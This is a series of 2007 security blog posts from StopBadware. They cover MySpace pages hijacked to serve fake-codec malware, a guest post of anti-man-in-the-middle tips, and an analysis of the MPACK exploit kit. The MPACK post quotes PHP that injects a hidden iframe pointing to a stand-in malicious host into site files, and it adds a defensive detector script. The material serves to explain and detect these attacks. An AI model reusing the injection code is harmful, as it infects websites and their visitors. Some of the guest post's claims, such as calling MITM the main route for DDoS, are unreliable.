Posted by Erica George
Fri, 09 Nov 2007 22:41:00 GMT
MySpace users, look out for a new brand of website hacking technique that’s emerged over the past week. The hack inserts code that loads a background image linking back to a badware site, and has so far had several prominent victims, most notably pop star Alicia Keys.
A user who clicks anywhere on the site that is not a legitimate, pre-existing link will be redirected by the linked background image to the badware site, apparently hosted in China. The user will also be prompted to download a codec to view videos – something one might expect on a MySpace page – which itself delivers malware.
The attacks were first noted last week by researchers at FaceTime Communications, and have gained widespread coverage this week due to the hacking of Keys’s page.
While MySpace reacted quickly to reports of the hacks, there is also word that Keys’s page, at least, has been reinfected once. There’s no estimate yet on how many users may have been infected, or how many MySpace pages have been compromised, but one thing seems certain: this is a technique to watch out for in the future, on MySpace and beyond.
Posted in all | Tags codecs, exploits, hacking, myspace
Posted by Erica George
Tue, 16 Oct 2007 20:40:00 GMT
StopBadware volunteer BadMal has been tracking a type of exploit that can affect sites on shared hosting services, and helping users in StopBadware’s discussion group learn about keeping their sites and computers clean. He graciously offered to share his analysis and advice here. (Please note that guest blog posts are independently written by members of our community, and do not represent official positions of StopBadware.org.)
“Man-in-the-Middle Exploits; what they are and how to STOP them” by BadMal
Most of us defend our PCs, websites and servers with an increasing variety of “anti” tools; however, it is equally important to understand how or where an assault comes from. So when personally considering your own PC or Internet security, this takes a proactive offensive view (“I can do something to STOP…”) rather than a passive “hiding in the bunker” defensive position. The best form of defense is offence?
The main route for many web site hacks, defacement, and denial of service (DDoS) attacks is Man-in-the-Middle (MITM) exploits. It is a very easy concept to understand for all of us; consider that an unknown person is able to read, insert and modify at will messages between two parties without either party knowing that the link between them has been compromised. It has a very techie background for those who want to know more – check out Wikipedia for the background or definitions. Here I will solely deal with a pragmatic approach of what you can do to STOP any MITM.
Firstly, a healthy element of paranoia helps; consider, from the PC you are reading this article with, what possible connections are there? Home or office network, local ISP, regional backbone routers, international re-routers, DNS servers, server farms, ad networks, web site host, and finally the web site. MITM could be lurking inside any one of these connections, points or nodes, and as we know so well at StopBadware, within a script on a web site. Worried? Don’t be; just assume the MITM is there, you have all the solutions at hand and mostly free. The answer is in the technical background “cryptography”, i.e. encryption, passwords, Chmod (website file permissions), and CAPTCHA (establishing the user is a human). Action checklist for all:
Email: use a digital ID or certificate (low cost), PGP encryption (Pretty Good Privacy – free), and as a surprise for sensitive email I now use and recommend Gmail with HTTPS, fewer connections! All this STOPS any MITM from being able to read your emails.
Web Surfing: Only access online shops or other personal ID sensitive areas where there is HTTPS (SSL), look at the web address, use secure passwords and change them regularly. If you really want to be in control use Firefox with added extras e.g. No-Script (STOPS any script, unless you say OK), Key Scrambler (encrypts any login or password entry, STOPS keyloggers), set your privacy options not to accept any cookie (STOPS unwanted and bad cookies from being stored on your PC), even consider using PHproxy (this STOPS a web site from even gaining your real IP address).
Webmasters: Only use FTPS to transfer files between your web site and the PC (this STOPS any MITM from intercepting data), use Chmod to restrict access to files, encrypt file directories where you can, apply different passwords to access cPanel and phpMyAdmin, use CAPTCHA for user logins and apply SSL for user data areas (these actions STOP any MITM from gaining access to your files).
Blocking: Probably the best offensive action you can take; think of it like this: “your PC is your home, your website is your shop, club, bar; you have the total right to bar entrance to hooligans or thieves”. It is much easier to refuse entrance than to try and throw the unwanted visitor out. For example, use OpenDNS on your router: it is free, automatically STOPS phishing sites and has many other blocking options. Use banning lists on cPanel, ban spammers on your forum, or ask your host for help.
Finally, refuse to be a victim and hide in the bunker; STOP the MITM, you actually have all the tools at hand. But… what if a MITM is already hiding inside before you go on the offensive? Check and clean your PC of any BadWare; for the webmaster, does your web host also host any bad guys? Easy to determine: check the latest block lists on the web.
- BadMal
Thanks, BadMal! StopBadware welcomes guest post ideas from members of our volunteer community. If there’s an issue in badware-fighting that you’d like to help us highlight here, contact us!
Posted in all | Tags badmal, defense, exploits, guestposts, maninthemiddle, mitm
Posted by Oliver Day
Fri, 13 Jul 2007 18:43:00 GMT
The folks at SANS published an excellent write-up which breaks down the MPACK exploit package. MPACK confirmed a lot of theories that SBW had regarding exploit patterns recorded over time. In particular, it uses nit-like behavior which homes in on the "scalp" of an HTML document, such as the <body> and <html> tags. The following code was pointed out in the SANS entry:
    // file extensions the kit will infect
    $file_types = array('php', 'htm', 'html', 'tpl');
    // splice a hidden iframe in immediately before the closing body tag
    $iframed_content = str_replace('</body>',
        '<iframe src=http://[EVIL].info/counter style=display:none></iframe></body>',
        $content);
The code above looks for the closing body tag and prepends an invisible iframe to it. If we break down the iframe tag, its parameters achieve the following:
- src = the url of the malicious code that is loaded
- style = turns iframe invisible using CSS style trick
Other variants to induce invisibility include using width="0" and height="0", which have the same effect as style=display:none.
The StopBadware team has seen this pattern for quite some time and it is possible that other packaged exploits use this style. It was more common in less technically impressive distributions to see the exploit appended to the file. This would be accomplished by using the "echo" command to simply append the iframe to the end of any HTML or PHP file. It is fair to say that if an iframe (or JavaScript) occurs before the opening html tag (<html>) or after the closing html tag (</html>), someone has injected code into that page.
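As an added example (not code from the original post, SANS or MPACK), here is a small Python checker for the two injection signatures described above: iframes hidden via display:none or zero width/height, and iframe/script tags that sit before <html> or after </html>. The sample pages and the EXAMPLE-EVIL.invalid host are constructed for the example.

```python
import re

# Constructed sample pages (not taken from the post): one clean page, one with an
# MPACK-style hidden iframe spliced in before </body>, and one with an iframe
# appended after </html>, as the "echo >> file" variant leaves it.
CLEAN = "<html><body><p>hello</p></body></html>\n"
MPACK_STYLE = ("<html><body><p>hello</p>"
               "<iframe src=http://EXAMPLE-EVIL.invalid/counter style=display:none>"
               "</iframe></body></html>\n")
APPENDED = ("<html><body><p>hello</p></body></html>\n"
            '<iframe src="http://EXAMPLE-EVIL.invalid/c" width="0" height="0"></iframe>\n')

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
# CSS hiding, or a zero width/height attribute (0 or 0px, quoted or not).
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s/>])",
    re.IGNORECASE)


def find_hidden_iframes(html):
    """Return every iframe opening tag that is rendered invisible."""
    return [m.group(0) for m in IFRAME_RE.finditer(html) if HIDDEN_RE.search(m.group(0))]


def find_tags_outside_root(html):
    """Return iframe/script tags placed before <html> or after </html>."""
    lower = html.lower()
    start, end = lower.find("<html"), lower.rfind("</html>")
    hits = []
    for rx in (IFRAME_RE, SCRIPT_RE):
        for m in rx.finditer(html):
            if (start != -1 and m.start() < start) or (end != -1 and m.start() > end):
                hits.append(m.group(0))
    return hits


def scan(html):
    """Return findings keyed by signature; an empty dict means nothing suspicious."""
    findings = {}
    hidden = find_hidden_iframes(html)
    if hidden:
        findings["hidden_iframe"] = hidden
    outside = find_tags_outside_root(html)
    if outside:
        findings["outside_html_root"] = outside
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("mpack", MPACK_STYLE), ("appended", APPENDED)):
        print(name, scan(page))
```

Run over a directory of .php/.htm/.html/.tpl files, a non-empty result for a page that should not embed frames is a good trigger for a closer look at the file's modification time and the account that owns it.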
The SANS entry goes on to provide reasons behind the success of these attacks. The analysis confirms a great many theories we had come up with, in particular the ability to compromise a single account and leverage that into a system-wide exploit. This is particularly effective when used against "value" hosting providers who push 1000 or more websites onto a single box. It would make sense for hosting providers who are on our lists to consider following the changes recommended by this guide [1] and set up suExec or a proper chroot jail for the webserver. Before embarking on this task, realize that there are issues with setting up suExec or a chroot jail. These issues include:
- increased time to setup
- more support tickets due to increased complexity
- more resource use (RAM, processor) means fewer users per server
However, the upside is that a single compromise will not lead to the infection of all the other users on your system. Thousands of support calls and possibly the loss of revenue as an angry, and infected, user base migrates over to a more secure hosting provider are a potential downside to not implementing a more secure environment. StopBadware will be making a point of educating website owners in our community to ask their hosting providers for these security measures, to ensure they seek out more secure environments.
[1] http://www.seaoffire.net/fcgi-faq.html
Posted in all | Tags exploits, mpack